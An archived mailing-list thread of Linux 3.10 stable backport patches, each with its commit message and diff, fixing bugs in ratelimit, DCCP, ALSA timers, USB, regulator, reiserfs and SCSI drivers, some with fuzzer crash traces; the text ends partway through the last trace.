Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

[PATCH 3.10 288/319] ratelimit: fix bug in time interval by resetting right begin time

432 views
Skip to first unread message

Willy Tarreau

unread,
Feb 5, 2017, 2:30:07 PM2/5/17
to
From: Jaewon Kim <jaewon...@samsung.com>

commit c2594bc37f4464bc74f2c119eb3269a643400aa0 upstream.

rs->begin in ratelimit is set in two cases.
1) when rs->begin was not initialized
2) when rs->interval was passed

For case #2, current ratelimit sets the begin to 0. This incurrs
improper suppression. The begin value will be set in the next ratelimit
call by 1). Then the time interval check will be always false, and
rs->printed will not be initialized. Although enough time passed,
ratelimit may return 0 if rs->printed is not less than rs->burst. To
reset interval properly, begin should be jiffies rather than 0.

For an example code below:

static DEFINE_RATELIMIT_STATE(mylimit, 1, 1);
for (i = 1; i <= 10; i++) {
if (__ratelimit(&mylimit))
printk("ratelimit test count %d\n", i);
msleep(3000);
}

test result in the current code shows suppression even there is 3 seconds sleep.

[ 78.391148] ratelimit test count 1
[ 81.295988] ratelimit test count 2
[ 87.315981] ratelimit test count 4
[ 93.336267] ratelimit test count 6
[ 99.356031] ratelimit test count 8
[ 105.376367] ratelimit test count 10

Signed-off-by: Jaewon Kim <jaewon...@samsung.com>
Signed-off-by: Andrew Morton <ak...@linux-foundation.org>
Signed-off-by: Linus Torvalds <torv...@linux-foundation.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
lib/ratelimit.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/ratelimit.c b/lib/ratelimit.c
index 40e03ea..2c5de86 100644
--- a/lib/ratelimit.c
+++ b/lib/ratelimit.c
@@ -49,7 +49,7 @@ int ___ratelimit(struct ratelimit_state *rs, const char *func)
if (rs->missed)
printk(KERN_WARNING "%s: %d callbacks suppressed\n",
func, rs->missed);
- rs->begin = 0;
+ rs->begin = jiffies;
rs->printed = 0;
rs->missed = 0;
}
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:08 PM2/5/17
to
From: Eric Dumazet <edum...@google.com>

commit 6706a97fec963d6cb3f7fc2978ec1427b4651214 upstream.

dccp_v4_err() does not use pskb_may_pull() and might access garbage.

We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmp_socket_deliver() are more than enough.

This patch might allow to process more ICMP messages, as some routers
are still limiting the size of reflected bytes to 28 (RFC 792), instead
of extended lengths (RFC 1812 4.3.2.3)

Signed-off-by: Eric Dumazet <edum...@google.com>
Signed-off-by: David S. Miller <da...@davemloft.net>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
net/dccp/ipv4.c | 14 ++++++++------
1 file changed, 8 insertions(+), 6 deletions(-)

diff --git a/net/dccp/ipv4.c b/net/dccp/ipv4.c
index ebc54fe..294c642 100644
--- a/net/dccp/ipv4.c
+++ b/net/dccp/ipv4.c
@@ -212,7 +212,7 @@ static void dccp_v4_err(struct sk_buff *skb, u32 info)
{
const struct iphdr *iph = (struct iphdr *)skb->data;
const u8 offset = iph->ihl << 2;
- const struct dccp_hdr *dh = (struct dccp_hdr *)(skb->data + offset);
+ const struct dccp_hdr *dh;
struct dccp_sock *dp;
struct inet_sock *inet;
const int type = icmp_hdr(skb)->type;
@@ -222,11 +222,13 @@ static void dccp_v4_err(struct sk_buff *skb, u32 info)
int err;
struct net *net = dev_net(skb->dev);

- if (skb->len < offset + sizeof(*dh) ||
- skb->len < offset + __dccp_basic_hdr_len(dh)) {
- ICMP_INC_STATS_BH(net, ICMP_MIB_INERRORS);
- return;
- }
+ /* Only need dccph_dport & dccph_sport which are the first
+ * 4 bytes in dccp header.
+ * Our caller (icmp_socket_deliver()) already pulled 8 bytes for us.
+ */
+ BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_sport) > 8);
+ BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_dport) > 8);
+ dh = (struct dccp_hdr *)(skb->data + offset);

sk = inet_lookup(net, &dccp_hashinfo,
iph->daddr, dh->dccph_dport,
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:08 PM2/5/17
to
From: Mauro Carvalho Chehab <mch...@osg.samsung.com>

commit 1871d718a9db649b70f0929d2778dc01bc49b286 upstream.

The cx231xx_set_agc_analog_digital_mux_select() callers
expect it to return 0 or an error. Returning a positive value
makes the first attempt to switch between analog/digital to fail.

Signed-off-by: Mauro Carvalho Chehab <mch...@s-opensource.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/media/usb/cx231xx/cx231xx-avcore.c | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/drivers/media/usb/cx231xx/cx231xx-avcore.c b/drivers/media/usb/cx231xx/cx231xx-avcore.c
index 235ba65..79a24ef 100644
--- a/drivers/media/usb/cx231xx/cx231xx-avcore.c
+++ b/drivers/media/usb/cx231xx/cx231xx-avcore.c
@@ -1261,7 +1261,10 @@ int cx231xx_set_agc_analog_digital_mux_select(struct cx231xx *dev,
dev->board.agc_analog_digital_select_gpio,
analog_or_digital);

- return status;
+ if (status < 0)
+ return status;
+
+ return 0;
}

int cx231xx_enable_i2c_port_3(struct cx231xx *dev, bool is_port_3)
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:09 PM2/5/17
to
From: Vegard Nossum <vegard...@oracle.com>

commit 8ddc05638ee42b18ba4fe99b5fb647fa3ad20456 upstream.

I hit this with syzkaller:

kasan: CONFIG_KASAN_INLINE enabled
kasan: GPF could be caused by NULL-ptr deref or user memory access
general protection fault: 0000 [#1] PREEMPT SMP KASAN
CPU: 0 PID: 1327 Comm: a.out Not tainted 4.8.0-rc2+ #190
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014
task: ffff88011278d600 task.stack: ffff8801120c0000
RIP: 0010:[<ffffffff82c8ba07>] [<ffffffff82c8ba07>] snd_hrtimer_start+0x77/0x100
RSP: 0018:ffff8801120c7a60 EFLAGS: 00010006
RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000007
RDX: 0000000000000009 RSI: 1ffff10023483091 RDI: 0000000000000048
RBP: ffff8801120c7a78 R08: ffff88011a5cf768 R09: ffff88011a5ba790
R10: 0000000000000002 R11: ffffed00234b9ef1 R12: ffff880114843980
R13: ffffffff84213c00 R14: ffff880114843ab0 R15: 0000000000000286
FS: 00007f72958f3700(0000) GS:ffff88011aa00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000603001 CR3: 00000001126ab000 CR4: 00000000000006f0
Stack:
ffff880114843980 ffff880111eb2dc0 ffff880114843a34 ffff8801120c7ad0
ffffffff82c81ab1 0000000000000000 ffffffff842138e0 0000000100000000
ffff880111eb2dd0 ffff880111eb2dc0 0000000000000001 ffff880111eb2dc0
Call Trace:
[<ffffffff82c81ab1>] snd_timer_start1+0x331/0x670
[<ffffffff82c85bfd>] snd_timer_start+0x5d/0xa0
[<ffffffff82c8795e>] snd_timer_user_ioctl+0x88e/0x2830
[<ffffffff8159f3a0>] ? __follow_pte.isra.49+0x430/0x430
[<ffffffff82c870d0>] ? snd_timer_pause+0x80/0x80
[<ffffffff815a26fa>] ? do_wp_page+0x3aa/0x1c90
[<ffffffff8132762f>] ? put_prev_entity+0x108f/0x21a0
[<ffffffff82c870d0>] ? snd_timer_pause+0x80/0x80
[<ffffffff816b0733>] do_vfs_ioctl+0x193/0x1050
[<ffffffff813510af>] ? cpuacct_account_field+0x12f/0x1a0
[<ffffffff816b05a0>] ? ioctl_preallocate+0x200/0x200
[<ffffffff81002f2f>] ? syscall_trace_enter+0x3cf/0xdb0
[<ffffffff815045ba>] ? __context_tracking_exit.part.4+0x9a/0x1e0
[<ffffffff81002b60>] ? exit_to_usermode_loop+0x190/0x190
[<ffffffff82001a97>] ? check_preemption_disabled+0x37/0x1e0
[<ffffffff81d93889>] ? security_file_ioctl+0x89/0xb0
[<ffffffff816b167f>] SyS_ioctl+0x8f/0xc0
[<ffffffff816b15f0>] ? do_vfs_ioctl+0x1050/0x1050
[<ffffffff81005524>] do_syscall_64+0x1c4/0x4e0
[<ffffffff83c32b2a>] entry_SYSCALL64_slow_path+0x25/0x25
Code: c7 c7 c4 b9 c8 82 48 89 d9 4c 89 ee e8 63 88 7f fe e8 7e 46 7b fe 48 8d 7b 48 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 <0f> b6 04 02 84 c0 74 04 84 c0 7e 65 80 7b 48 00 74 0e e8 52 46
RIP [<ffffffff82c8ba07>] snd_hrtimer_start+0x77/0x100
RSP <ffff8801120c7a60>
---[ end trace 5955b08db7f2b029 ]---

This can happen if snd_hrtimer_open() fails to allocate memory and
returns an error, which is currently not checked by snd_timer_open():

ioctl(SNDRV_TIMER_IOCTL_SELECT)
- snd_timer_user_tselect()
- snd_timer_close()
- snd_hrtimer_close()
- (struct snd_timer *) t->private_data = NULL
- snd_timer_open()
- snd_hrtimer_open()
- kzalloc() fails; t->private_data is still NULL

ioctl(SNDRV_TIMER_IOCTL_START)
- snd_timer_user_start()
- snd_timer_start()
- snd_timer_start1()
- snd_hrtimer_start()
- t->private_data == NULL // boom

[js] no put_device in 3.12 yet

Signed-off-by: Vegard Nossum <vegard...@oracle.com>
Signed-off-by: Takashi Iwai <ti...@suse.de>
Signed-off-by: Jiri Slaby <jsl...@suse.cz>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
sound/core/timer.c | 15 +++++++++++++--
1 file changed, 13 insertions(+), 2 deletions(-)

diff --git a/sound/core/timer.c b/sound/core/timer.c
index f297eac..749857a 100644
--- a/sound/core/timer.c
+++ b/sound/core/timer.c
@@ -291,8 +291,19 @@ int snd_timer_open(struct snd_timer_instance **ti,
}
timeri->slave_class = tid->dev_sclass;
timeri->slave_id = slave_id;
- if (list_empty(&timer->open_list_head) && timer->hw.open)
- timer->hw.open(timer);
+
+ if (list_empty(&timer->open_list_head) && timer->hw.open) {
+ int err = timer->hw.open(timer);
+ if (err) {
+ kfree(timeri->owner);
+ kfree(timeri);
+
+ module_put(timer->module);
+ mutex_unlock(&register_mutex);
+ return err;
+ }
+ }
+
list_add_tail(&timeri->open_list, &timer->open_list_head);
snd_timer_check_master(timeri);
mutex_unlock(&register_mutex);
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:09 PM2/5/17
to
From: Nishanth Menon <n...@ti.com>

commit 61dc0a446e5d08f2de8a24b45f69a1e302bb1b1b upstream.

pm_runtime_get_sync does return a error value that must be checked for
error conditions, else, due to various reasons, the device maynot be
enabled and the system will crash due to lack of clock to the hardware
module.

Before:
12.562784] [00000000] *pgd=fe193835
12.562792] Internal error: : 1406 [#1] SMP ARM
[...]
12.562864] CPU: 1 PID: 241 Comm: modprobe Not tainted 4.7.0-rc4-next-20160624 #2
12.562867] Hardware name: Generic DRA74X (Flattened Device Tree)
12.562872] task: ed51f140 ti: ed44c000 task.ti: ed44c000
12.562886] PC is at omap4_rng_init+0x20/0x84 [omap_rng]
12.562899] LR is at set_current_rng+0xc0/0x154 [rng_core]
[...]

After the proper checks:
[ 94.366705] omap_rng 48090000.rng: _od_fail_runtime_resume: FIXME:
missing hwmod/omap_dev info
[ 94.375767] omap_rng 48090000.rng: Failed to runtime_get device -19
[ 94.382351] omap_rng 48090000.rng: initialization failed.

Fixes: 665d92fa85b5 ("hwrng: OMAP: convert to use runtime PM")
Cc: Paul Walmsley <pa...@pwsan.com>
Signed-off-by: Nishanth Menon <n...@ti.com>
Signed-off-by: Herbert Xu <her...@gondor.apana.org.au>
[wt: adjusted context for pre-3.12-rc1 kernels]

Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/char/hw_random/omap-rng.c | 16 ++++++++++++++--
1 file changed, 14 insertions(+), 2 deletions(-)

diff --git a/drivers/char/hw_random/omap-rng.c b/drivers/char/hw_random/omap-rng.c
index d2903e7..52aebbe 100644
--- a/drivers/char/hw_random/omap-rng.c
+++ b/drivers/char/hw_random/omap-rng.c
@@ -127,7 +127,12 @@ static int omap_rng_probe(struct platform_device *pdev)
dev_set_drvdata(&pdev->dev, priv);

pm_runtime_enable(&pdev->dev);
- pm_runtime_get_sync(&pdev->dev);
+ ret = pm_runtime_get_sync(&pdev->dev);
+ if (ret) {
+ dev_err(&pdev->dev, "Failed to runtime_get device: %d\n", ret);
+ pm_runtime_put_noidle(&pdev->dev);
+ goto err_ioremap;
+ }

ret = hwrng_register(&omap_rng_ops);
if (ret)
@@ -182,8 +187,15 @@ static int omap_rng_suspend(struct device *dev)
static int omap_rng_resume(struct device *dev)
{
struct omap_rng_private_data *priv = dev_get_drvdata(dev);
+ int ret;
+
+ ret = pm_runtime_get_sync(dev);
+ if (ret) {
+ dev_err(dev, "Failed to runtime_get device: %d\n", ret);
+ pm_runtime_put_noidle(dev);
+ return ret;
+ }

- pm_runtime_get_sync(dev);
omap_rng_write_reg(priv, RNG_MASK_REG, 0x1);

return 0;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:09 PM2/5/17
to
From: Jan Remmet <j.re...@phytec.de>

commit 8f9165c981fed187bb483de84caf9adf835aefda upstream.

http://www.ti.com/lit/pdf/SWCZ010:
DCDC o/p voltage can go higher than programmed value

Impact:
VDDI, VDD2, and VIO output programmed voltage level can go higher than
expected or crash, when coming out of PFM to PWM mode or using DVFS.

Description:
When DCDC CLK SYNC bits are 11/01:
* VIO 3-MHz oscillator is the source clock of the digital core and input
clock of VDD1 and VDD2
* Turn-on of VDD1 and VDD2 HSD PFETis synchronized or at a constant
phase shift
* Current pulled though VCC1+VCC2 is Iload(VDD1) + Iload(VDD2)
* The 3 HSD PFET will be turned-on at the same time, causing the highest
possible switching noise on the application. This noise level depends
on the layout, the VBAT level, and the load current. The noise level
increases with improper layout.

When DCDC CLK SYNC bits are 00:
* VIO 3-MHz oscillator is the source clock of digital core
* VDD1 and VDD2 are running on their own 3-MHz oscillator
* Current pulled though VCC1+VCC2 average of Iload(VDD1) + Iload(VDD2)
* The switching noise of the 3 SMPS will be randomly spread over time,
causing lower overall switching noise.

Workaround:
Set DCDCCTRL_REG[1:0]= 00.

Signed-off-by: Jan Remmet <j.re...@phytec.de>
Signed-off-by: Mark Brown <bro...@kernel.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/regulator/tps65910-regulator.c | 6 ++++++
1 file changed, 6 insertions(+)

diff --git a/drivers/regulator/tps65910-regulator.c b/drivers/regulator/tps65910-regulator.c
index 45c1644..1ed4145 100644
--- a/drivers/regulator/tps65910-regulator.c
+++ b/drivers/regulator/tps65910-regulator.c
@@ -1080,6 +1080,12 @@ static int tps65910_probe(struct platform_device *pdev)
pmic->num_regulators = ARRAY_SIZE(tps65910_regs);
pmic->ext_sleep_control = tps65910_ext_sleep_control;
info = tps65910_regs;
+ /* Work around silicon erratum SWCZ010: output programmed
+ * voltage level can go higher than expected or crash
+ * Workaround: use no synchronization of DCDC clocks
+ */
+ tps65910_reg_clear_bits(pmic->mfd, TPS65910_DCDCCTRL,
+ DCDCCTRL_DCDCCKSYNC_MASK);
break;
case TPS65911:
pmic->get_ctrl_reg = &tps65911_get_ctrl_register;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:09 PM2/5/17
to
From: Jeff Mahoney <je...@suse.com>

commit 0a11b9aae49adf1f952427ef1a1d9e793dd6ffb6 upstream.

new_insert_key only makes any sense when it's associated with a
new_insert_ptr, which is initialized to NULL and changed to a
buffer_head when we also initialize new_insert_key. We can key off of
that to avoid the uninitialized warning.

Link: http://lkml.kernel.org/r/5eca5ffb-2155-8df2...@suse.com
Signed-off-by: Jeff Mahoney <je...@suse.com>
Cc: Arnd Bergmann <ar...@arndb.de>
Cc: Jan Kara <ja...@suse.cz>
Cc: Linus Torvalds <torv...@linux-foundation.org>
Signed-off-by: Andrew Morton <ak...@linux-foundation.org>
Signed-off-by: Linus Torvalds <torv...@linux-foundation.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
fs/reiserfs/ibalance.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/fs/reiserfs/ibalance.c b/fs/reiserfs/ibalance.c
index e1978fd..58cce0c 100644
--- a/fs/reiserfs/ibalance.c
+++ b/fs/reiserfs/ibalance.c
@@ -1082,8 +1082,9 @@ int balance_internal(struct tree_balance *tb, /* tree_balance structure
insert_ptr);
}

- memcpy(new_insert_key_addr, &new_insert_key, KEY_SIZE);
insert_ptr[0] = new_insert_ptr;
+ if (new_insert_ptr)
+ memcpy(new_insert_key_addr, &new_insert_key, KEY_SIZE);

return order;
}
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:09 PM2/5/17
to
From: Eric Dumazet <edum...@google.com>

commit 346da62cc186c4b4b1ac59f87f4482b47a047388 upstream.

Andrey reported following warning while fuzzing with syzkaller

WARNING: CPU: 1 PID: 21072 at net/dccp/proto.c:83 dccp_set_state+0x229/0x290
Kernel panic - not syncing: panic_on_warn set ...

CPU: 1 PID: 21072 Comm: syz-executor Not tainted 4.9.0-rc1+ #293
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
ffff88003d4c7738 ffffffff81b474f4 0000000000000003 dffffc0000000000
ffffffff844f8b00 ffff88003d4c7804 ffff88003d4c7800 ffffffff8140c06a
0000000041b58ab3 ffffffff8479ab7d ffffffff8140beae ffffffff8140cd00
Call Trace:
[< inline >] __dump_stack lib/dump_stack.c:15
[<ffffffff81b474f4>] dump_stack+0xb3/0x10f lib/dump_stack.c:51
[<ffffffff8140c06a>] panic+0x1bc/0x39d kernel/panic.c:179
[<ffffffff8111125c>] __warn+0x1cc/0x1f0 kernel/panic.c:542
[<ffffffff8111144c>] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585
[<ffffffff8389e5d9>] dccp_set_state+0x229/0x290 net/dccp/proto.c:83
[<ffffffff838a0aa2>] dccp_close+0x612/0xc10 net/dccp/proto.c:1016
[<ffffffff8316bf1f>] inet_release+0xef/0x1c0 net/ipv4/af_inet.c:415
[<ffffffff82b6e89e>] sock_release+0x8e/0x1d0 net/socket.c:570
[<ffffffff82b6e9f6>] sock_close+0x16/0x20 net/socket.c:1017
[<ffffffff815256ad>] __fput+0x29d/0x720 fs/file_table.c:208
[<ffffffff81525bb5>] ____fput+0x15/0x20 fs/file_table.c:244
[<ffffffff811727d8>] task_work_run+0xf8/0x170 kernel/task_work.c:116
[< inline >] exit_task_work include/linux/task_work.h:21
[<ffffffff8111bc53>] do_exit+0x883/0x2ac0 kernel/exit.c:828
[<ffffffff811221fe>] do_group_exit+0x10e/0x340 kernel/exit.c:931
[<ffffffff81143c94>] get_signal+0x634/0x15a0 kernel/signal.c:2307
[<ffffffff81054aad>] do_signal+0x8d/0x1a30 arch/x86/kernel/signal.c:807
[<ffffffff81003a05>] exit_to_usermode_loop+0xe5/0x130
arch/x86/entry/common.c:156
[< inline >] prepare_exit_to_usermode arch/x86/entry/common.c:190
[<ffffffff81006298>] syscall_return_slowpath+0x1a8/0x1e0
arch/x86/entry/common.c:259
[<ffffffff83fc1a62>] entry_SYSCALL_64_fastpath+0xc0/0xc2
Dumping ftrace buffer:
(ftrace buffer empty)
Kernel Offset: disabled

Fix this the same way we did for TCP in commit 565b7b2d2e63
("tcp: do not send reset to already closed sockets")

Signed-off-by: Eric Dumazet <edum...@google.com>
Reported-by: Andrey Konovalov <andre...@google.com>
Tested-by: Andrey Konovalov <andre...@google.com>
Signed-off-by: David S. Miller <da...@davemloft.net>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
net/dccp/proto.c | 4 ++++
1 file changed, 4 insertions(+)

diff --git a/net/dccp/proto.c b/net/dccp/proto.c
index 6c7c78b8..cb55fb9 100644
--- a/net/dccp/proto.c
+++ b/net/dccp/proto.c
@@ -1012,6 +1012,10 @@ void dccp_close(struct sock *sk, long timeout)
__kfree_skb(skb);
}

+ /* If socket has been already reset kill it. */
+ if (sk->sk_state == DCCP_CLOSED)
+ goto adjudge_to_death;
+
if (data_was_unread) {
/* Unread data was tossed, send an appropriate Reset Code */
DCCP_WARN("ABORT with %u bytes unread\n", data_was_unread);
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:09 PM2/5/17
to
From: Dmitry Torokhov <dmitry....@gmail.com>

commit b27c0d0c3bf3073e8ae19875eb1d3755c5e8c072 upstream.

"calibrate" attribute does not provide "show" methods and thus we should
not mark it as readable.

Signed-off-by: Dmitry Torokhov <dmitry....@gmail.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/input/touchscreen/ili210x.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/input/touchscreen/ili210x.c b/drivers/input/touchscreen/ili210x.c
index 1418bdd..ceaa790 100644
--- a/drivers/input/touchscreen/ili210x.c
+++ b/drivers/input/touchscreen/ili210x.c
@@ -169,7 +169,7 @@ static ssize_t ili210x_calibrate(struct device *dev,

return count;
}
-static DEVICE_ATTR(calibrate, 0644, NULL, ili210x_calibrate);
+static DEVICE_ATTR(calibrate, S_IWUSR, NULL, ili210x_calibrate);

static struct attribute *ili210x_attributes[] = {
&dev_attr_calibrate.attr,
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:09 PM2/5/17
to
From: Felipe Balbi <felipe...@linux.intel.com>

commit c7de573471832dff7d31f0c13b0f143d6f017799 upstream.

When using SG lists, we would end up setting
request->actual to:

num_mapped_sgs * (request->length - count)

Let's fix that up by incrementing request->actual
only once.

Reported-by: Brian E Rogers <brian.e...@intel.com>
Signed-off-by: Felipe Balbi <felipe...@linux.intel.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/usb/dwc3/gadget.c | 19 +++++++++++--------
1 file changed, 11 insertions(+), 8 deletions(-)

diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
index 6e70c88..0dfee61 100644
--- a/drivers/usb/dwc3/gadget.c
+++ b/drivers/usb/dwc3/gadget.c
@@ -1802,14 +1802,6 @@ static int __dwc3_cleanup_done_trbs(struct dwc3 *dwc, struct dwc3_ep *dep,
s_pkt = 1;
}

- /*
- * We assume here we will always receive the entire data block
- * which we should receive. Meaning, if we program RX to
- * receive 4K but we receive only 2K, we assume that's all we
- * should receive and we simply bounce the request back to the
- * gadget driver for further processing.
- */
- req->request.actual += req->request.length - count;
if (s_pkt)
return 1;
if ((event->status & DEPEVT_STATUS_LST) &&
@@ -1829,6 +1821,7 @@ static int dwc3_cleanup_done_reqs(struct dwc3 *dwc, struct dwc3_ep *dep,
struct dwc3_trb *trb;
unsigned int slot;
unsigned int i;
+ int count = 0;
int ret;

do {
@@ -1845,6 +1838,8 @@ static int dwc3_cleanup_done_reqs(struct dwc3 *dwc, struct dwc3_ep *dep,
slot++;
slot %= DWC3_TRB_NUM;
trb = &dep->trb_pool[slot];
+ count += trb->size & DWC3_TRB_SIZE_MASK;
+

ret = __dwc3_cleanup_done_trbs(dwc, dep, req, trb,
event, status);
@@ -1852,6 +1847,14 @@ static int dwc3_cleanup_done_reqs(struct dwc3 *dwc, struct dwc3_ep *dep,
break;
}while (++i < req->request.num_mapped_sgs);

+ /*
+ * We assume here we will always receive the entire data block
+ * which we should receive. Meaning, if we program RX to
+ * receive 4K but we receive only 2K, we assume that's all we
+ * should receive and we simply bounce the request back to the
+ * gadget driver for further processing.
+ */
+ req->request.actual += req->request.length - count;
dwc3_gadget_giveback(dep, req, status);

if (ret)
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:09 PM2/5/17
to
From: Steffen Maier <ma...@linux.vnet.ibm.com>

commit 771bf03537ddfa4a4dde62ef9dfbc82e4f77ab20 upstream.

With commit 2c55b750a884b86dea8b4cc5f15e1484cc47a25c
("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
we lost the N_Port-ID where an ELS response comes from.
With commit 7c7dc196814b9e1d5cc254dc579a5fa78ae524f7
("[SCSI] zfcp: Simplify handling of ct and els requests")
we lost the N_Port-ID where a CT response comes from.
It's especially useful if the request SAN trace record
with D_ID was already lost due to trace buffer wrap.

GS uses an open WKA port handle and ELS just a D_ID, and
only for ELS we could get D_ID from QTCB bottom via zfcp_fsf_req.
To cover both cases, add a new field to zfcp_fsf_ct_els
and fill it in on request to use in SAN response trace.
Strictly speaking the D_ID on SAN response is the FC frame's S_ID.
We don't need a field for the other end which is always us.

Signed-off-by: Steffen Maier <ma...@linux.vnet.ibm.com>
Fixes: 2c55b750a884 ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
Fixes: 7c7dc196814b ("[SCSI] zfcp: Simplify handling of ct and els requests")
Reviewed-by: Benjamin Block <bbl...@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <ha...@suse.com>
Signed-off-by: Martin K. Petersen <martin....@oracle.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/s390/scsi/zfcp_dbf.c | 2 +-
drivers/s390/scsi/zfcp_fsf.c | 2 ++
drivers/s390/scsi/zfcp_fsf.h | 4 +++-
3 files changed, 6 insertions(+), 2 deletions(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index 1abe57d..a940602 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -400,7 +400,7 @@ void zfcp_dbf_san_res(char *tag, struct zfcp_fsf_req *fsf)

length = (u16)(ct_els->resp->length + FC_CT_HDR_LEN);
zfcp_dbf_san(tag, dbf, sg_virt(ct_els->resp), ZFCP_DBF_SAN_RES, length,
- fsf->req_id, 0);
+ fsf->req_id, ct_els->d_id);
}

/**
diff --git a/drivers/s390/scsi/zfcp_fsf.c b/drivers/s390/scsi/zfcp_fsf.c
index 8898139..f246097 100644
--- a/drivers/s390/scsi/zfcp_fsf.c
+++ b/drivers/s390/scsi/zfcp_fsf.c
@@ -1085,6 +1085,7 @@ int zfcp_fsf_send_ct(struct zfcp_fc_wka_port *wka_port,

req->handler = zfcp_fsf_send_ct_handler;
req->qtcb->header.port_handle = wka_port->handle;
+ ct->d_id = wka_port->d_id;
req->data = ct;

zfcp_dbf_san_req("fssct_1", req, wka_port->d_id);
@@ -1188,6 +1189,7 @@ int zfcp_fsf_send_els(struct zfcp_adapter *adapter, u32 d_id,

hton24(req->qtcb->bottom.support.d_id, d_id);
req->handler = zfcp_fsf_send_els_handler;
+ els->d_id = d_id;
req->data = els;

zfcp_dbf_san_req("fssels1", req, d_id);
diff --git a/drivers/s390/scsi/zfcp_fsf.h b/drivers/s390/scsi/zfcp_fsf.h
index 5e795b8..8cad41f 100644
--- a/drivers/s390/scsi/zfcp_fsf.h
+++ b/drivers/s390/scsi/zfcp_fsf.h
@@ -3,7 +3,7 @@
*
* Interface to the FSF support functions.
*
- * Copyright IBM Corp. 2002, 2010
+ * Copyright IBM Corp. 2002, 2015
*/

#ifndef FSF_H
@@ -462,6 +462,7 @@ struct zfcp_blk_drv_data {
* @handler_data: data passed to handler function
* @port: Optional pointer to port for zfcp internal ELS (only test link ADISC)
* @status: used to pass error status to calling function
+ * @d_id: Destination ID of either open WKA port for CT or of D_ID for ELS
*/
struct zfcp_fsf_ct_els {
struct scatterlist *req;
@@ -470,6 +471,7 @@ struct zfcp_fsf_ct_els {
void *handler_data;
struct zfcp_port *port;
int status;
+ u32 d_id;
};

#endif /* FSF_H */
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:09 PM2/5/17
to
From: Vegard Nossum <vegard...@oracle.com>

commit 11749e086b2766cccf6217a527ef5c5604ba069c upstream.

I got this with syzkaller:

==================================================================
BUG: KASAN: null-ptr-deref on address 0000000000000020
Read of size 32 by task syz-executor/22519
CPU: 1 PID: 22519 Comm: syz-executor Not tainted 4.8.0-rc2+ #169
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2
014
0000000000000001 ffff880111a17a00 ffffffff81f9f141 ffff880111a17a90
ffff880111a17c50 ffff880114584a58 ffff880114584a10 ffff880111a17a80
ffffffff8161fe3f ffff880100000000 ffff880118d74a48 ffff880118d74a68
Call Trace:
[<ffffffff81f9f141>] dump_stack+0x83/0xb2
[<ffffffff8161fe3f>] kasan_report_error+0x41f/0x4c0
[<ffffffff8161ff74>] kasan_report+0x34/0x40
[<ffffffff82c84b54>] ? snd_timer_user_read+0x554/0x790
[<ffffffff8161e79e>] check_memory_region+0x13e/0x1a0
[<ffffffff8161e9c1>] kasan_check_read+0x11/0x20
[<ffffffff82c84b54>] snd_timer_user_read+0x554/0x790
[<ffffffff82c84600>] ? snd_timer_user_info_compat.isra.5+0x2b0/0x2b0
[<ffffffff817d0831>] ? proc_fault_inject_write+0x1c1/0x250
[<ffffffff817d0670>] ? next_tgid+0x2a0/0x2a0
[<ffffffff8127c278>] ? do_group_exit+0x108/0x330
[<ffffffff8174653a>] ? fsnotify+0x72a/0xca0
[<ffffffff81674dfe>] __vfs_read+0x10e/0x550
[<ffffffff82c84600>] ? snd_timer_user_info_compat.isra.5+0x2b0/0x2b0
[<ffffffff81674cf0>] ? do_sendfile+0xc50/0xc50
